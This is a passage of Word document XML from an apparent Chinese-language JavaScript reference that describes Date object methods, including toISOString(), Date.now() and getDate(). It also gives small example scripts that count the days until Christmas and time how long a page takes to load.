        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置日期的秒值（以及可选的毫秒值），使用本地或世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setTime()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用毫秒的格式，设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>setYear()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>设置一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的年份值。已弃用，建议使用</w:t>
      </w:r>
      <w:r>
        <w:t>setFullYear()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toDateString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个表示当前日期的日期部分的字符串，使用本地时区。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toGMTString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>时区，将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为一个字符串。已弃用，建议使用</w:t>
      </w:r>
      <w:r>
        <w:t>toUTCString()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toISOString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转为字符串，使用</w:t>
      </w:r>
      <w:r>
        <w:t>ISO-8601</w:t>
      </w:r>
      <w:r>
        <w:t>标准来组合日期</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>时间格式和</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>toJSON()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>序列化，使用</w:t>
      </w:r>
      <w:r>
        <w:t>toISOString()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleDateString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个表示当前日期的日期部分的字符串，使用本地时区，本地时间格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为字符串，使用本地时区以及本地时间格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个表示当前日期的时间部分的字符串，使用本地时区以及本地时间格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:t>用本地时区将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转换为字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toTimeString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个表示指定日期的时间部分的字符串，使用本地时区表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>toUTCString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转为字符串，使用世界时间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>转为对应的内部毫秒格式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>静态方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了上面列出的那些实例方法，</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象也定义了三个表态方法。这些方法通过</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数本身调用，而不是通过各个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.now()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回当前时间，自纪元开始后的毫秒数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.parse()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>解析一个日期及时间的字符串表示，返回该日期的内部毫秒表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定的</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>日期及时间的毫秒表示。</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Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言中内置的数据类型。</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象通过上面描述的新</w:t>
      </w:r>
      <w:r>
        <w:t>Date()</w:t>
      </w:r>
      <w:r>
        <w:t>语法创建。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建了一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象之后，可以使用许多方法来对它进行操作。大多数方法只是简单地允许使用本地或</w:t>
      </w:r>
      <w:r>
        <w:t>UTC</w:t>
      </w:r>
      <w:r>
        <w:t>（世界时间，或</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）时间获取或设置这个对象的年、月、日、小时、分钟、秒以及毫秒值。</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法以及它的变体则将日期转换为人类可读的字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>se</w:t>
      </w:r>
      <w:r>
        <w:t>tTime()</w:t>
      </w:r>
      <w:r>
        <w:t>则获取或设置该</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的内部表示</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>自</w:t>
      </w:r>
      <w:r>
        <w:t>1970</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>日午夜（</w:t>
      </w:r>
      <w:r>
        <w:t>GMT</w:t>
      </w:r>
      <w:r>
        <w:t>）以来的毫秒数。在这个标准的毫秒格式中，日期及时间都由一个单独的整数表示，这使得对日期的算术操作特别简单。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准要求</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象能以毫秒的精度，表示</w:t>
      </w:r>
      <w:r>
        <w:t>1970-01-01</w:t>
      </w:r>
      <w:r>
        <w:t>之前及之后</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>亿天的日期及时间。这是一个加上或减去</w:t>
      </w:r>
      <w:r>
        <w:t>273 785</w:t>
      </w:r>
      <w:r>
        <w:t>年的区间，也就是说，直到</w:t>
      </w:r>
      <w:r>
        <w:t>275 755</w:t>
      </w:r>
      <w:r>
        <w:t>年，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的时钟才会走到头。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>示例</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象后，有若干方法可以用来操作它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">d=new </w:t>
      </w:r>
      <w:r>
        <w:t>Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>取得当前日期及时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write('Today is:"+d.toLocaleDateString()+'.');//</w:t>
      </w:r>
      <w:r>
        <w:t>显示日期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write('The time is:'+d.toLocaleTimeString());//</w:t>
      </w:r>
      <w:r>
        <w:t>显示时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var dayOfWeek=d.getDay();//</w:t>
      </w:r>
      <w:r>
        <w:t>星期几？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var weekend=(dayOfWeek==0)||(dayOfWeek==6);//</w:t>
      </w:r>
      <w:r>
        <w:t>是周末吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的另一个常用方法是从当前时间的毫秒表示中减去其他</w:t>
      </w:r>
      <w:r>
        <w:t>的时间，以便判断两个时间之间的差。下面的客户端代码示例显示了两种这样的用法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script language="JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>today=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>记下当天的日期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>christmas=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>取得当前年份的日期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>christmas.setMonth(11);//</w:t>
      </w:r>
      <w:r>
        <w:t>将月份设置为</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>christmas.setDate(25);//</w:t>
      </w:r>
      <w:r>
        <w:t>以及将天设置为</w:t>
      </w:r>
      <w:r>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果圣诞节还没有过，计算现在与圣诞节之间的毫秒数，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>然后将它转为天数并输出一条消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(today.</w:t>
      </w:r>
      <w:r>
        <w:t>getTime()</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>christmas.getTime()){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>difference=christmas.getTime()-today.getTime();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>difference=Math.floor(difference/(1000*60*60*24));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write('</w:t>
      </w:r>
      <w:r>
        <w:t>距圣诞节只有</w:t>
      </w:r>
      <w:r>
        <w:t>'+difference+'</w:t>
      </w:r>
      <w:r>
        <w:t>天了！＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//……</w:t>
      </w:r>
      <w:r>
        <w:t>这儿是其他的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script language="JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这儿使用</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象来计时</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通</w:t>
      </w:r>
      <w:r>
        <w:t>过除以</w:t>
      </w:r>
      <w:r>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:t>来将毫秒转为秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>now=new Date();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write('</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞加载本页花费了</w:t>
      </w:r>
      <w:r>
        <w:t>'+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(now.getTime()-today.getTime())/1000+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>秒。</w:t>
      </w:r>
      <w:r>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w: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Date.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Date.UTC()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="604" w:name="Date_getDate__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Date.getDate()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="604"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的月份中的日期值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>date.getDate()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给定</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:t>的月份中的日期值，使用本地时间。返回值在</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
